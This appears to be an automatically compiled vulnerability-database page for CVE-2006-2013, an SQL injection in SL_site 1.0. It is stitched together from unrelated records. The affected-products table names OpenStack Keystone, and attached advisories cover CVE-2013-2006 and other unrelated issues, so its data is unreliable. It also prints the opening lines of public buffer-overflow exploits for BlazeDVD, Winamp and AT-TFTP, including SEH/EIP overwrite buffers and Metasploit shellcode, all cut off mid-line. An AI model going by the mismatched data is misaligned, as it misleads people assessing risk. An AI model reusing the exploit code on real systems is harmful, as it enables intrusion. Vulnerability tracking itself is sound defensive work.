CVE-2006-2013
published 2006-04-25
Priority: P428, high, 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 1.41% (69.2th percentile)
SQL injection vulnerability in page.php in SL_site 1.0 allows remote attackers to execute arbitrary SQL commands via the id_page parameter. NOTE: this issue could be used to produce resultant XSS from an error message.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openstack | keystone | >= 0 < 8.0.0a0 | 8.0.0a0 |
| web-provence | sl_site | — | — |
CVSS provenance
nvd: v2.0, 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat: 2.1 LOW
GHSA
OpenStack Keystone Sensitive information disclosure via log files
ghsa·2022-05-17
CVE-2013-2006 [LOW] CWE-200 OpenStack Keystone Sensitive information disclosure via log files
OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive information by reading the log file.
GHSA
GHSA-53w3-777w-6rhw: SQL injection vulnerability in page
ghsa_unreviewed·2022-05-01
CVE-2006-2013 [HIGH] GHSA-53w3-777w-6rhw: SQL injection vulnerability in page
SQL injection vulnerability in page.php in SL_site 1.0 allows remote attackers to execute arbitrary SQL commands via the id_page parameter. NOTE: this issue could be used to produce resultant XSS from an error message.
Red Hat
kernel: xen: Information leak on XSAVE/XRSTOR capable AMD CPUs
vendor_redhat·2013-06-03·CVSS 2.1
CVE-2013-2076 [LOW] kernel: xen: Information leak on XSAVE/XRSTOR capable AMD CPUs
Xen 4.0.x, 4.1.x, and 4.2.x, when running on AMD64 processors, only save/restore the FOP, FIP, and FDP x87 registers in FXSAVE/FXRSTOR when an exception is pending, which allows one domain to determine portions of the state of floating point instructions of other domains, which can be leveraged to obtain sensitive information such as cryptographic keys, a similar vulnerability to CVE-2006-1056. NOTE: this is the documented behavior of AMD64 processors, but it is inconsistent with Intel processors in a security-relevant fashion that was not addressed by the kernels.
Statement: Not vulnerable.
This issue did not affect the versions of the kernel-xen package as shipped with Red Hat Enterprise Linux 5.
This issue did not affect R
Red Hat
keystone: DEBUG level LDAP password disclosure in log files
vendor_redhat·2013-04-19·CVSS 2.1
CVE-2013-2006 [LOW] keystone: DEBUG level LDAP password disclosure in log files
OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive information by reading the log file.
No detection rules found.
Exploit-DB
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
exploitdb·2013-10-28
CVE-2006-6199 BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link:
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x
Exploit-DB
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
exploitdb·2013-07-16
CVE-2006-6199 BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
---
#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x
Exploit-DB
Winamp 5.12 - '.m3u' Local Stack Buffer Overflow
exploitdb·2013-06-17·CVSS 7.6
CVE-2006-0720 [HIGH] Winamp 5.12 - '.m3u' Local Stack Buffer Overflow
---
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
exploitdb·2013-04-12
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
---
# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1
# Version: 2.0
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF discovered in 2006 by [email protected] to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely.
#
#!/usr/bin/python
import
Bugzilla
CVE-2013-2006 OpenStack keystone: DEBUG level LDAP password disclosure in log files
bugzilla·2013-04-24·CVSS 2.1
CVE-2013-2006 [LOW] CVE-2013-2006 OpenStack keystone: DEBUG level LDAP password disclosure in log files
j-ago reports:
A security flaw was found in the way Openstack Keystone (previously) performed management of LDAP
password and admin_token Keystone daemon configuration file values. A local attacker could use this
flaw to obtain sensitive information.
Relevant upstream patch (Gerrit form):
[3] https://review.openstack.org/#/c/26826/
External references:
https://bugs.launchpad.net/ossn/+bug/1168252
http://openwall.com/lists/oss-security/2013/04/24/1
Discussion:
Further CVE-2013-1977 vs CVE-2013-2006 ids disambiguation:
https://bugs.launchpad.net/devstack/+bug/1168252/comments/7
---
Thierry Carrez via OSS security:
"This is tracked at https://bugs.launchpad.net/keystone/+bug/1172195
Note that it only a
Bugzilla
CVE-2013-1977 openstack-keystone: Insecure management of LDAP and admin_token configuration file values
bugzilla·2013-04-19·CVSS 2.1
CVE-2013-1977 [LOW] CVE-2013-1977 openstack-keystone: Insecure management of LDAP and admin_token configuration file values
A security flaw was found in the way Openstack Keystone (previously) performed management of LDAP password and admin_token Keystone daemon configuration file values. A local attacker could use this flaw to obtain sensitive information.
References:
[1] https://bugs.launchpad.net/keystone/+bug/1168252
[2] http://www.openwall.com/lists/oss-security/2013/04/19/2
Relevant upstream patch (Gerrit form):
[3] https://review.openstack.org/#/c/26826/
Discussion:
Further CVE-2013-1977 vs CVE-2013-2006 ids disambiguation:
https://bugs.launchpad.net/devstack/+bug/1168252/comments/7
---
CVE-2013-1977 does not affect our installer, as it was hardened previously and has 0600 permissions, as noted
http://secunia.com/advisories/19792
http://securitytracker.com/id?1015972
http://www.osvdb.org/24896
http://www.securityfocus.com/bid/17667
http://www.vupen.com/english/advisories/2006/1487
https://exchange.xforce.ibmcloud.com/vulnerabilities/26036
2006-04-25
Published